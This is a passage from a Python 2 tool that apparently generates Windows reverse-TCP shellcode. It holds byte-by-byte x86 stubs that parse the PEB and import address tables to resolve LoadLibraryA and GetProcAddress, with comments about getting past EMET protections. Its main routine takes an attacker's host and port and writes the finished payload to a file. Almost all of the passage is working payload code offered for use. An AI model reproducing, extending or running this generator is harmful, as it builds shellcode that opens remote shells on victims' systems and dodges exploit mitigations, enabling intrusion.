349 |                    "\x8b\x06"                      # mov eax, dword ptr [esi]              ;Mov pointer to Named Imports
350 |                    "\x03\xc3"                      # add eax, ebx                          ;Find in memory offset
351 |                    "\x83\xc0\x02"                  # add eax, 2                            ;Adjust to ASCII name start
352 |                    "\x3b\xc8"                      # cmp ecx, eax                          ;Check if over bounds
353 |                    "\x72\x18"                      # jb 0x1066                             ;If not over, don't jump to increment
354 |                    "\x3b\xc2"                      # cmp eax, edx                          ;Check if under Named import
355 |                    "\x72\x14"                      # jb 0x1066                             ;If not over, don't jump to increment
356 |                    "\x3e\x8b\x7c\x24\x04"          # mov edi, dword ptr ds:[esp + 4]       ;Move API name to edi
357 |                    "\x39\x38"                      # cmp dword ptr [eax], edi              ;Check first 4 chars
358 |                    "\x75\x0b"                      # jne 0x1066                            ;If not a match, jump to increment
359 |                    "\x3e\x8b\x7c\x24\x08"          # mov edi, dword ptr ds:[esp + 8]       ;Move API 2nd named part to edi
360 |                    "\x39\x78\x08"                  # cmp dword ptr [eax + 8], edi          ;Check next 4 chars
361 |                    "\x75\x01"                      # jne 0x1066                            ;If not a match, jump to increment
362 |                    "\xc3"                          # ret                                   ;If a match, ret
363 | 
364 |                    #Increment:
365 |                    "\x83\xc5\x04"                  # add ebp, 4                            ;inc offset
366 |                    "\x83\xc6\x04"                  # add esi, 4                            ;inc to next name
367 |                    "\xeb\xd5"                      # jmp 0x1043                            ;jmp findAPI
368 | 
369 |                    #loadAPIs
370 |                    "\x68\x61\x72\x79\x41"          # push 0x41797261                       ;aryA (notice the 4 char jump between beginning)
371 |                    "\x68\x4c\x6f\x61\x64"          # push 0x64616f4c                       ;Load
372 |                    "\xe8\xb3\xff\xff\xff"          # call 0x1032                           ;call setBounds
373 |                    "\x03\xd5"                      # add edx, ebp                          ;In memory offset of API thunk
374 |                    "\x83\xc4\x08"                  # add ESP, 8                            ;Move stack to import base addr
375 |                    #"\x5d"                          # pop ebp                              ;remove loadlibrary from stack
376 |                    #"\x5d"                          # pop ebp                              ;...
377 |                    #"\x33\xed"                      # xor ebp, ebp                         ;
378 |                    "\x5f"                          # pop edi                               ;restore import base addr for parsing
379 |                    "\x52"                          # push edx                              ;save LoadLibraryA thunk address on stack
380 |                    "\x68\x64\x64\x72\x65"          # push 0x65726464                       ;ddre
381 |                    "\x68\x47\x65\x74\x50"          # push 0x50746547                       ;Getp
382 |                    "\xe8\x9d\xff\xff\xff"          # call 0x1032                           ;call setBounds
383 |                    "\x03\xd5"                      # add edx, ebp                          ;
384 |                    "\x5d"                          # pop ebp                               ;
385 |                    "\x5d"                          # pop ebp                               ;
386 |                    "\x5b"                          # pop ebx                               ;Pop LoadlibraryA thunk addr into ebx
387 |                    "\x8b\xca"                      # mov ecx, edx                          ;Move GetProcaddress thunk addr into ecx
388 |                    )
389 |                     # LOADLIBA in EBX
390 |                     # GETPROCADDR in ECX
391 |     return shellcode 
392 | 
393 | def gpa_parser_stub():
394 |     shellcode = ( "\xfc"
395 |                    "\x31\xd2"                      # xor edx, edx                          ;prep edx for use
396 |                    "\x64\x8b\x52\x30"              # mov edx, dword ptr fs:[edx + 0x30]    ;PEB
397 |                    "\x8b\x52\x08"                  # mov edx, dword ptr [edx + 8]          ;PEB.imagebase
398 |                    "\x8b\xda"                      # mov ebx, edx                          ;Set ebx to imagebase
399 |                    #"\x8b\xc3"                      # mov eax, ebx                         ;Set eax to imagebase
400 |                    "\x03\x52\x3c"                  # add edx, dword ptr [edx + 0x3c]       ;"PE"
401 |                    "\x8b\xba\x80\x00\x00\x00"      # mov edi, dword ptr [edx + 0x80]       ;Import Table RVA
402 |                    "\x03\xfb"                      # add edi, ebx                          ;Import table in memory offset
403 | 
404 |                    #findImport:
405 |                    "\x8b\x57\x0c"                  # mov edx, dword ptr [edi + 0xc]        ;Offset for Import Directory Table Name RVA
406 |                    "\x03\xd3"                      # add edx, ebx                          ;Offset in memory
407 |                    "\x81\x3a\x4b\x45\x52\x4e"      # cmp dword ptr [edx], 0x4e52454b       ;Replace this so any API can be called
408 |                    "\x74\x05"                      # je 0x102f                             ;jmp saveBase
409 |                    "\x83\xc7\x14"                  # add edi, 0x14                         ;inc to next import
410 |                    "\xeb\xee"                      # jmp 0x101d                            ;Jmp findImport
411 | 
412 |                    #saveBase:
413 |                    "\x57"                          # push edi                              ;save addr of import base
414 |                    "\xeb\x3e"                      # jmp 0x106e                            ;jmp loadAPIs
415 | 
416 |                    #setBounds:
417 |                    #;this is needed as the parsing could lead to eax ptr's to unreadable addresses
418 |                    "\x8b\x57\x10"                  # mov edx, dword ptr [edi + 0x10]       ;Point to API name
419 |                    "\x03\xd3"                      # add edx, ebx                          ;Adjust to in memory offset
420 |                    "\x8b\x37"                      # mov esi, dword ptr [edi]              ;Set ESI to the Named Import base
421 |                    "\x03\xf3"                      # add esi, ebx                          ;Adjust to in memory offset
422 |                    "\x8b\xca"                      # mov ecx, edx                          ;Mov in memory offset to ecx
423 |                    "\x81\xc1\x00\x00\xff\x00"      # add ecx, 0x40000                      ;Set an upper bounds for reading
424 |                    "\x33\xed"                      # xor ebp, ebp                          ;Zero ebp for thunk offset
425 | 
426 |                    #findAPI:
427 |                    "\x8b\x06"                      # mov eax, dword ptr [esi]              ;Mov pointer to Named Imports
428 |                    "\x03\xc3"                      # add eax, ebx                          ;Find in memory offset
429 |                    "\x83\xc0\x02"                  # add eax, 2                            ;Adjust to ASCII name start
430 |                    "\x3b\xc8"                      # cmp ecx, eax                          ;Check if over bounds
431 |                    "\x72\x18"                      # jb 0x1066                             ;If not over, don't jump to increment
432 |                    "\x3b\xc2"                      # cmp eax, edx                          ;Check if under Named import
433 |                    "\x72\x14"                      # jb 0x1066                             ;If not over, don't jump to increment
434 |                    "\x3e\x8b\x7c\x24\x04"          # mov edi, dword ptr ds:[esp + 4]       ;Move API name to edi
435 |                    "\x39\x38"                      # cmp dword ptr [eax], edi              ;Check first 4 chars
436 |                    "\x75\x0b"                      # jne 0x1066                            ;If not a match, jump to increment
437 |                    "\x3e\x8b\x7c\x24\x08"          # mov edi, dword ptr ds:[esp + 8]       ;Move API 2nd named part to edi
438 |                    "\x39\x78\x08"                  # cmp dword ptr [eax + 8], edi          ;Check next 4 chars
439 |                    "\x75\x01"                      # jne 0x1066                            ;If not a match, jump to increment
440 |                    "\xc3"                          # ret                                   ;If a match, ret
441 | 
442 |                    #Increment:
443 |                    "\x83\xc5\x04"                  # add ebp, 4                            ;inc offset
444 |                    "\x83\xc6\x04"                  # add esi, 4                            ;inc to next name
445 |                    "\xeb\xd5"                      # jmp 0x1043                            ;jmp findAPI
446 | 
447 |                    #loadAPIs
448 |                   
449 |                    "\x68\x64\x64\x72\x65"          # push 0x65726464                       ;ddre
450 |                    "\x68\x47\x65\x74\x50"          # push 0x50746547                       ;Getp
451 |                    "\xe8\xb3\xff\xff\xff"          # call 0x1032                           ;call setBounds
452 |                    "\x03\xd5"                      # add edx, ebp                          ;
453 |                    "\x5d"                          # pop ebp                               ;
454 |                    "\x5d"                          # pop ebp                               ;
455 |                    "\x8b\xca"                      # mov ecx, edx                          ;Move GetProcaddress thunk addr into ecx
456 |                    )
457 |                 #GPA in ECX
458 |     shellcode += "\x89\xCD" # mov ebp, ecx
459 |     
460 |     shellcode += ("\x31\xd2"                          # xor    edx,edx
461 |                   "\x64\x8b\x52\x30"                  # mov    edx,DWORD PTR fs:[edx+0x30]
462 |                   "\x8b\x52\x0c"                      # mov    edx,DWORD PTR [edx+0xc]
463 |                   "\x8b\x52\x14"                      # mov    edx,DWORD PTR [edx+0x14]
464 |                   "\x8b\x72\x28"                      # mov    esi,DWORD PTR [edx+0x28]
465 |                   "\x6a\x18"                          # push   0x18
466 |                   "\x59"                              # pop    ecx
467 |                   "\x31\xff"                          # xor    edi,edi
468 |                   "\x31\xc0"                          # xor    eax,eax
469 |                   "\xac"                              # lods   al,BYTE PTR ds:[esi]
470 |                   "\x3c\x61"                          # cmp    al,0x61
471 |                   "\x7c\x02"                          # jl     0x20
472 |                   "\x2c\x20"                          # sub    al,0x20
473 |                   "\xc1\xcf\x0d"                      # ror    edi,0xd
474 |                   "\x01\xc7"                          # add    edi,eax
475 |                   "\xe2\xf0"                          # loop   0x17
476 |                   "\x81\xff\x5b\xbc\x4a\x6a"          # cmp    edi,0x6a4abc5b
477 |                   "\x8b\x5a\x10"                      # mov    ebx,DWORD PTR [edx+0x10]
478 |                   "\x8b\x12"                          # mov    edx,DWORD PTR [edx]
479 |                   "\x75\xdb"                          # jne    0xf
480 |                   )
481 | 
482 |     # kernel32.dll in ebx
483 |     shellcode  += ("\x6A\x00"                 # push 0
484 |                    "\x68\x61\x72\x79\x41"     # push LoadLibraryA\x00
485 |                    "\x68\x4c\x69\x62\x72"
486 |                    "\x68\x4c\x6f\x61\x64" 
487 |                    "\x54"                     # push esp
488 |                    "\x53"                     # push ebx (kernerl32.dll handle)
489 |                    "\x89\xE9"                 # mov ecx,ebp getprocaddr
490 |                    "\xFF\x11"                 # call dword ptr [ecx]  # call dword ptr [ecx] 
491 |                    "\x50"                     # push eax ; LLA in EAX
492 |                    "\x89\xe3"                 # mov ebx, esp ; mov ptr to LLA in ebx
493 |                    "\x87\xcd"                 # xchng ebx, esi
494 |                    )
495 |     # LOADLIBA in EBX
496 |     # GETPROCADDR in ECX
497 | 
498 |     return shellcode
499 | 
500 | def loaded_iat_parser_stub(DLL_HASH):
501 |     print "[*] HASH", hex(DLL_HASH)
502 |     shellcode1 = (  # Locate ADVAPI32 via PEB Ldr.InMemoryOrderModuleList ref:http://blog.harmonysecurity.com/2009_06_01_archive.html
503 |                  "\x90"                          # 00000001  90                nop
504 |                  "\xfc"                         # 00000002  FC                cld
505 |                  "\x31\xd2"                     # 00000003  31D2              xor edx,edx
506 |                  "\x64\x8b\x52\x30"             # 00000005  648B5230          mov edx,[fs:edx+0x30]
507 |                  "\x8b\x52\x0c"                 # 00000009  8B520C            mov edx,[edx+0xc]
508 |                  "\x8b\x52\x14"                 # 0000000C  8B5214            mov edx,[edx+0x14]
509 |                  # next_mod
510 |                  "\x8b\x72\x28"                 # 0000000F  8B7228            mov esi,[edx+0x28]
511 |                  "\x6a\x18"                     # 00000012  6A18              push byte +0x18
512 |                  "\x59"                         # 00000014  59                pop ecx
513 |                  "\x31\xff"                     # 00000015  31FF              xor edi,edi
514 |                  # loop_modname
515 |                  "\x31\xc0"                     # 00000017  31C0              xor eax,eax
516 |                  "\xac"                         # 00000019  AC                lodsb
517 |                  "\x3c\x61"                     # 0000001A  3C61              cmp al,0x61
518 |                  "\x7c\x02"                     # 0000001C  7C02              jl 0x20
519 |                  "\x2c\x20"                     # 0000001E  2C20              sub al,0x20
520 |                  # not_lowercase
521 |                  "\xc1\xcf\x0d"                 # 00000020  C1CF0D            ror edi,byte 0xd
522 |                  "\x01\xc7"                     # 00000023  01C7              add edi,eax
523 |                  "\xe2\xf0"                     # 00000025  E2F0              loop 0x17
524 |                  # ADVAPI32.DLL Hash Computes To 0xc78a43f4 ; Add details on how hash is computed
525 |                  # Options will work as follows:
526 |                  # 1. APIs exist in IAT (don't look for modules)
527 |                  # 2. In a loaded module exists an IAT.  Use that.
528 |                  # 3. If EMET is in USE (for sure) and there is NO loaded module
529 |                  #    that has loadliba/getprocaddr use advapi32.dll (in EMET)
530 |                  )
531 |                  #"\x81\xff\xf4\x43\x8a\xc7"     # 00000027  81FFF4438AC7      cmp edi,0xc78a43f4
532 |                  
533 |                  #KERNEL32.dll 0x6a4abc5b
534 |                  #"\x81\xff\x5b\xbc\x4a\x6a"
535 |                  
536 |                  #shlwapi.dll 0xeb181366
537 |                  #"\x81\xff\x66\x13\x18\xeb"
538 |                  
539 |                  # EMET.dll 0xeb616ca5
540 |                  #"\x81\xFF\xa5\x6c\x61\xeb"
541 |     
542 |     shellcode2 = "\x81\xff"
543 |     shellcode2 += struct.pack("<I", DLL_HASH)
544 | 
545 | 
546 |     shellcode3 = ("\x8b\x5a\x10"                 # 0000002D  8B5A10            mov ebx,[edx+0x10]
547 |                  "\x8b\x12"                     # 00000030  8B12              mov edx,[edx]
548 |                  "\x75\xdb"                     # 00000032  75DB              jnz 0xf
549 |                  # iatparser
550 |                  "\x90"                         # 00000034  90                nop
551 |                  "\x90"                         # 00000035  90                nop
552 |                  "\x90"                         # 00000036  90                nop
553 |                  "\x89\xda"                     # 00000037  89DA              mov edx,ebx
554 |                  "\x03\x52\x3c"                 # 00000039  03523C            add edx,[edx+0x3c]
555 |                  "\x8b\xba\x80\x00\x00\x00"     # 0000003C  8BBA80000000      mov edi,[edx+0x80]
556 |                  "\x01\xdf"                     # 00000042  01DF              add edi,ebx
557 |                  # findImport
558 |                  "\x90"                         # 00000044  90                nop
559 |                  "\x90"                         # 00000045  90                nop
560 |                  "\x8b\x57\x0c"                 # 00000046  8B570C            mov edx,[edi+0xc]
561 |                  "\x01\xda"                     # 00000049  01DA              add edx,ebx
562 |                  "\x81\x3a\x4b\x45\x52\x4e"     # 0000004B  813A4B45524E      cmp dword [edx],0x4e52454b
563 |                  "\x81\x7a\x04\x45\x4c\x33\x32"  # 00000051  817A04454C3332    cmp dword [edx+0x4],0x32334c45
564 |                  "\x74\x05"                     # 00000058  7405              jz 0x5f
565 |                  "\x83\xc7\x14"                 # 0000005A  83C714            add edi,byte +0x14
566 |                  "\xeb\xe5"                     # 0000005D  EBE5              jmp short 0x44
567 |                  # saveBase
568 |                  "\x57"                         # 0000005F  57                push edi
569 |                  "\xeb\x3d"                     # 00000060  EB3D              jmp short 0x9f
570 |                  # setbounds
571 |                  "\x90"                         # 00000062  90                nop
572 |                  "\x90"                         # 00000063  90                nop
573 |                  "\x8b\x57\x10"                 # 00000064  8B5710            mov edx,[edi+0x10]
574 |                  "\x01\xda"                     # 00000067  01DA              add edx,ebx
575 |                  "\x8b\x37"                     # 00000069  8B37              mov esi,[edi]
576 |                  "\x01\xde"                     # 0000006B  01DE              add esi,ebx
577 |                  "\x89\xd1"                     # 0000006D  89D1              mov ecx,edx
578 |                  # this can be set based on the size of the .data section of the exploted binary or
579 |                  # for the exploited DLL ... 0xff0000 for now.
580 |                  #"\x81\xc1\x00\x00\x04\x00"      # add ecx, 0x40000                      ;Set an upper bounds for reading
581 |                     
582 |                  "\x81\xc1\x00\x00\xff\x00"     # 0000006F  81C10000FF00      add ecx,0xff0000
583 |                  
584 |                  "\x31\xed"                     # 00000075  31ED              xor ebp,ebp
585 |                  # findApi
586 |                  "\x90"                         # 00000077  90                nop
587 |                  "\x90"                         # 00000078  90                nop
588 |                  "\x8b\x06"                     # 00000079  8B06              mov eax,[esi]
589 |                  "\x01\xd8"                     # 0000007B  01D8              add eax,ebx
590 |                  "\x83\xc0\x02"                 # 0000007D  83C002            add eax,byte +0x2
591 |                  "\x39\xc1"                     # 00000080  39C1              cmp ecx,eax
592 |                  "\x72\x13"                     # 00000082  7213              jc 0x97
593 |                  "\x8b\x7c\x24\x04"             # 00000084  8B7C2404          mov edi,[esp+0x4]
594 |                  "\x39\x38"                     # 00000088  3938              cmp [eax],edi
595 |                  "\x75\x0b"                     # 0000008A  750B              jnz 0x97
596 |                  "\x3e\x8b\x7c\x24\x08"         # 0000008C  3E8B7C2408        mov edi,[ds:esp+0x8]
597 |                  "\x39\x78\x08"                 # 00000091  397808            cmp [eax+0x8],edi
598 |                  "\x75\x01"                     # 00000094  7501              jnz 0x97
599 |                  "\xc3"                         # 00000096  C3                ret
600 |                  # Increment
601 |                  "\x83\xc5\x04"                 # 00000097  83C504            add ebp,byte +0x4
602 |                  "\x83\xc6\x04"                 # 0000009A  83C604            add esi,byte +0x4
603 |                  "\xeb\xd8"                     # 0000009D  EBD8              jmp short 0x77
604 |                  # loadApis
605 |                  "\x90"                         # 0000009F  90                nop
606 |                  "\x90"                         # 000000A0  90                nop
607 |                  "\x68\x61\x72\x79\x41"         # 000000A1  6861727941        push dword 0x41797261
608 |                  "\x68\x4c\x6f\x61\x64"         # 000000A6  684C6F6164        push dword 0x64616f4c
609 |                  "\xe8\xb2\xff\xff\xff"         # 000000AB  E8B2FFFFFF        call dword 0x62
610 |                  "\x01\xea"                     # 000000B0  01EA              add edx,ebp
611 |                  "\x83\xc4\x08"                 # 000000B2  83C408            add esp,byte +0x8
612 |                  "\x5f"                         # 000000B5  5F                pop edi
613 |                  "\x52"                         # 000000B6  52                push edx
614 |                  "\x68\x64\x64\x72\x65"         # 000000B7  6864647265        push dword 0x65726464
615 |                  "\x68\x47\x65\x74\x50"         # 000000BC  6847657450        push dword 0x50746547
616 |                  "\xe8\x9c\xff\xff\xff"         # 000000C1  E89CFFFFFF        call dword 0x62
617 |                  "\x01\xea"                     # 000000C6  01EA              add edx,ebp
618 |                  "\x5d"                         # 000000C8  5D                pop ebp
619 |                  "\x5d"                         # 000000C9  5D                pop ebp
620 |                  "\x5b"                         # 000000CA  5B                pop ebx
621 |                  "\x89\xd1"                     # 000000CB  89D1              mov ecx,edx
622 |                 )
623 |                # LOADLIBA in EBX
624 |                # GETPROCADDR in ECX
625 | 
626 |     return shellcode1 + shellcode2 + shellcode3
627 | 
628 | def loaded_gpa_iat_parser_stub(DLL_HASH):
629 |     print "[*] HASH", hex(DLL_HASH)
630 |     shellcode1 = (  # Locate ADVAPI32 via PEB Ldr.InMemoryOrderModuleList ref:http://blog.harmonysecurity.com/2009_06_01_archive.html
631 |                  "\x90"                          # 00000001  90                nop
632 |                  "\xfc"                         # 00000002  FC                cld
633 |                  "\x31\xd2"                     # 00000003  31D2              xor edx,edx
634 |                  "\x64\x8b\x52\x30"             # 00000005  648B5230          mov edx,[fs:edx+0x30]
635 |                  "\x8b\x52\x0c"                 # 00000009  8B520C            mov edx,[edx+0xc]
636 |                  "\x8b\x52\x14"                 # 0000000C  8B5214            mov edx,[edx+0x14]
637 |                  # next_mod
638 |                  "\x8b\x72\x28"                 # 0000000F  8B7228            mov esi,[edx+0x28]
639 |                  "\x6a\x18"                     # 00000012  6A18              push byte +0x18
640 |                  "\x59"                         # 00000014  59                pop ecx
641 |                  "\x31\xff"                     # 00000015  31FF              xor edi,edi
642 |                  # loop_modname
643 |                  "\x31\xc0"                     # 00000017  31C0              xor eax,eax
644 |                  "\xac"                         # 00000019  AC                lodsb
645 |                  "\x3c\x61"                     # 0000001A  3C61              cmp al,0x61
646 |                  "\x7c\x02"                     # 0000001C  7C02              jl 0x20
647 |                  "\x2c\x20"                     # 0000001E  2C20              sub al,0x20
648 |                  # not_lowercase
649 |                  "\xc1\xcf\x0d"                 # 00000020  C1CF0D            ror edi,byte 0xd
650 |                  "\x01\xc7"                     # 00000023  01C7              add edi,eax
651 |                  "\xe2\xf0"                     # 00000025  E2F0              loop 0x17
652 |                  # ADVAPI32.DLL Hash Computes To 0xc78a43f4 ; Add details on how hash is computed
653 |                  # Options will work as follows:
654 |                  # 1. APIs exist in IAT (don't look for modules)
655 |                  # 2. In a loaded module exists an IAT.  Use that.
656 |                  # 3. If EMET is in USE (for sure) and there is NO loaded module
657 |                  #    that has loadliba/getprocaddr use advapi32.dll (in EMET)
658 |                  )
659 |                  #"\x81\xff\xf4\x43\x8a\xc7"     # 00000027  81FFF4438AC7      cmp edi,0xc78a43f4
660 |                  
661 |                  #KERNEL32.dll 0x6a4abc5b
662 |                  #"\x81\xff\x5b\xbc\x4a\x6a"
663 |                  
664 |                  #shlwapi.dll 0xeb181366
665 |                  #"\x81\xff\x66\x13\x18\xeb"
666 |                  
667 |                  # EMET.dll 0xeb616ca5
668 |                  #"\x81\xFF\xa5\x6c\x61\xeb"
669 |     
670 |     shellcode2 = "\x81\xff"
671 |     shellcode2 += struct.pack("<I", DLL_HASH)
672 | 
673 | 
674 |     shellcode3 = ("\x8b\x5a\x10"                 # 0000002D  8B5A10            mov ebx,[edx+0x10]
675 |                  "\x8b\x12"                     # 00000030  8B12              mov edx,[edx]
676 |                  "\x75\xdb"                     # 00000032  75DB              jnz 0xf
677 |                  # iatparser
678 |                  "\x90"                         # 00000034  90                nop
679 |                  "\x90"                         # 00000035  90                nop
680 |                  "\x90"                         # 00000036  90                nop
681 |                  "\x89\xda"                     # 00000037  89DA              mov edx,ebx
682 |                  "\x03\x52\x3c"                 # 00000039  03523C            add edx,[edx+0x3c]
683 |                  "\x8b\xba\x80\x00\x00\x00"     # 0000003C  8BBA80000000      mov edi,[edx+0x80]
684 |                  "\x01\xdf"                     # 00000042  01DF              add edi,ebx
685 |                  # findImport
686 |                  "\x90"                         # 00000044  90                nop
687 |                  "\x90"                         # 00000045  90                nop
688 |                  "\x8b\x57\x0c"                 # 00000046  8B570C            mov edx,[edi+0xc]
689 |                  "\x01\xda"                     # 00000049  01DA              add edx,ebx
690 |                  "\x81\x3a\x4b\x45\x52\x4e"     # 0000004B  813A4B45524E      cmp dword [edx],0x4e52454b
691 |                  "\x81\x7a\x04\x45\x4c\x33\x32"  # 00000051  817A04454C3332    cmp dword [edx+0x4],0x32334c45
692 |                  "\x74\x05"                     # 00000058  7405              jz 0x5f
693 |                  "\x83\xc7\x14"                 # 0000005A  83C714            add edi,byte +0x14
694 |                  "\xeb\xe5"                     # 0000005D  EBE5              jmp short 0x44
695 |                  # saveBase
696 |                  "\x57"                         # 0000005F  57                push edi
697 |                  "\xeb\x3d"                     # 00000060  EB3D              jmp short 0x9f
698 |                  # setbounds
699 |                  "\x90"                         # 00000062  90                nop
700 |                  "\x90"                         # 00000063  90                nop
701 |                  "\x8b\x57\x10"                 # 00000064  8B5710            mov edx,[edi+0x10]
702 |                  "\x01\xda"                     # 00000067  01DA              add edx,ebx
703 |                  "\x8b\x37"                     # 00000069  8B37              mov esi,[edi]
704 |                  "\x01\xde"                     # 0000006B  01DE              add esi,ebx
705 |                  "\x89\xd1"                     # 0000006D  89D1              mov ecx,edx
706 |                  # this can be set based on the size of the .data section of the exploted binary or
707 |                  # for the exploited DLL ... 0xff0000 for now.
708 |                  #"\x81\xc1\x00\x00\x04\x00"      # add ecx, 0x40000                      ;Set an upper bounds for reading
709 |                     
710 |                  "\x81\xc1\x00\x00\xff\x00"     # 0000006F  81C10000FF00      add ecx,0xff0000
711 |                  
712 |                  "\x31\xed"                     # 00000075  31ED              xor ebp,ebp
713 |                  # findApi
714 |                  "\x90"                         # 00000077  90                nop
715 |                  "\x90"                         # 00000078  90                nop
716 |                  "\x8b\x06"                     # 00000079  8B06              mov eax,[esi]
717 |                  "\x01\xd8"                     # 0000007B  01D8              add eax,ebx
718 |                  "\x83\xc0\x02"                 # 0000007D  83C002            add eax,byte +0x2
719 |                  "\x39\xc1"                     # 00000080  39C1              cmp ecx,eax
720 |                  "\x72\x13"                     # 00000082  7213              jc 0x97
721 |                  "\x8b\x7c\x24\x04"             # 00000084  8B7C2404          mov edi,[esp+0x4]
722 |                  "\x39\x38"                     # 00000088  3938              cmp [eax],edi
723 |                  "\x75\x0b"                     # 0000008A  750B              jnz 0x97
724 |                  "\x3e\x8b\x7c\x24\x08"         # 0000008C  3E8B7C2408        mov edi,[ds:esp+0x8]
725 |                  "\x39\x78\x08"                 # 00000091  397808            cmp [eax+0x8],edi
726 |                  "\x75\x01"                     # 00000094  7501              jnz 0x97
727 |                  "\xc3"                         # 00000096  C3                ret
728 |                  # Increment
729 |                  "\x83\xc5\x04"                 # 00000097  83C504            add ebp,byte +0x4
730 |                  "\x83\xc6\x04"                 # 0000009A  83C604            add esi,byte +0x4
731 |                  "\xeb\xd8"                     # 0000009D  EBD8              jmp short 0x77
732 |                  # loadApis
733 |                  "\x90"                         # 0000009F  90                nop
734 |                  "\x90"                         # 000000A0  90                nop
735 |                  "\x68\x64\x64\x72\x65"          # push 0x65726464                       ;ddre
736 |                  "\x68\x47\x65\x74\x50"          # push 0x50746547                       ;Getp
737 |                  "\xe8\xb3\xff\xff\xff"          # call 0x1032                           ;call setBounds
738 |                  "\x03\xd5"                      # add edx, ebp                          ;
739 |                  "\x5d"                          # pop ebp                               ;
740 |                  "\x5d"                          # pop ebp                               ;
741 |                  "\x8b\xca"                      # mov ecx, edx                          ;Move GetProcaddress thunk addr into ecx
742 |                  )
743 |             #GPA in ECX
744 |     shellcode3 += "\x89\xCD" # mov ebp, ecx
745 |     #shellcode1 += "\x90\x90\xFC\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x6A\x18\x59\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\x12\x75\xDB"
746 |     shellcode3 += ("\x31\xd2"                          # xor    edx,edx
747 |                   "\x64\x8b\x52\x30"                  # mov    edx,DWORD PTR fs:[edx+0x30]
748 |                   "\x8b\x52\x0c"                      # mov    edx,DWORD PTR [edx+0xc]
749 |                   "\x8b\x52\x14"                      # mov    edx,DWORD PTR [edx+0x14]
750 |                   "\x8b\x72\x28"                      # mov    esi,DWORD PTR [edx+0x28]
751 |                   "\x6a\x18"                          # push   0x18
752 |                   "\x59"                              # pop    ecx
753 |                   "\x31\xff"                          # xor    edi,edi
754 |                   "\x31\xc0"                          # xor    eax,eax
755 |                   "\xac"                              # lods   al,BYTE PTR ds:[esi]
756 |                   "\x3c\x61"                          # cmp    al,0x61
757 |                   "\x7c\x02"                          # jl     0x20
758 |                   "\x2c\x20"                          # sub    al,0x20
759 |                   "\xc1\xcf\x0d"                      # ror    edi,0xd
760 |                   "\x01\xc7"                          # add    edi,eax
761 |                   "\xe2\xf0"                          # loop   0x17
762 |                   "\x81\xff\x5b\xbc\x4a\x6a"          # cmp    edi,0x6a4abc5b
763 |                   "\x8b\x5a\x10"                      # mov    ebx,DWORD PTR [edx+0x10]
764 |                   "\x8b\x12"                          # mov    edx,DWORD PTR [edx]
765 |                   "\x75\xdb"                          # jne    0xf
766 |                   )
767 | 
768 |     # kernel32.dll in ebx
769 |     shellcode3 += ("\x6A\x00"                 # push 0
770 |                    "\x68\x61\x72\x79\x41"     # push LoadLibraryA\x00
771 |                    "\x68\x4c\x69\x62\x72"
772 |                    "\x68\x4c\x6f\x61\x64" 
773 |                    "\x54"                     # push esp
774 |                    "\x53"                     # push ebx (kernerl32.dll handle)
775 |                    "\x89\xE9"                 # mov ecx,ebp getprocaddr
776 |                    "\xFF\x11"                 # call dword ptr [ecx]  # call dword ptr [ecx] 
777 |                    "\x50"                     # push eax ; LLA in EAX
778 |                    "\x89\xe3"                 # mov ebx, esp ; mov ptr to LLA in ebx
779 |                    "\x87\xcd"                 # xchng ebx, esi
780 |                    )
781 |     # LOADLIBA in EBX
782 |     # GETPROCADDR in ECX
783 | 
784 |     return shellcode1 + shellcode2 + shellcode3
785 | 
786 | 
787 | if __name__ == "__main__":
788 |     shellcode = ''
789 |     if len(sys.argv) != 7:
790 |         print "IAT parser reverse tcp payload generator"
791 |         print '\xe0\xb2\xa0_\xe0\xb2\xa0'
792 |         print "Usage:", sys.argv[0], "PE_BINARY", "HOST", "PORT", 'Operating_System_(winXP, winVista, win7, win8, win10)', 'Force_EMET_HASH_(True/False)', 'Force_Loaded_module_(True/False)'
793 |         sys.exit(-1)
794 | 
795 | 
796 |     dlls, lla_gpa_found, gpa_found = check_apis(sys.argv[1], sys.argv[4])
797 |     
798 |     print "[*] DLLs in the import table:", dlls
799 |     
800 |     shellcode = decision_tree(sys.argv[2], int(sys.argv[3]), dlls, lla_gpa_found, gpa_found, sys.argv[4], sys.argv[5], sys.argv[6])
801 | 
802 |     print "[*] Payload length:", len(shellcode)
803 | 
804 |     print "\"\\x" + "\\x".join("{:02x}".format(ord(c)) for c in shellcode) + "\""
805 |     print "Writing payload to shellcode_output.bin"
806 |     with open('shellcode_output.bin', 'w') as f:
807 |         f.write(shellcode)
808 | 


--------------------------------------------------------------------------------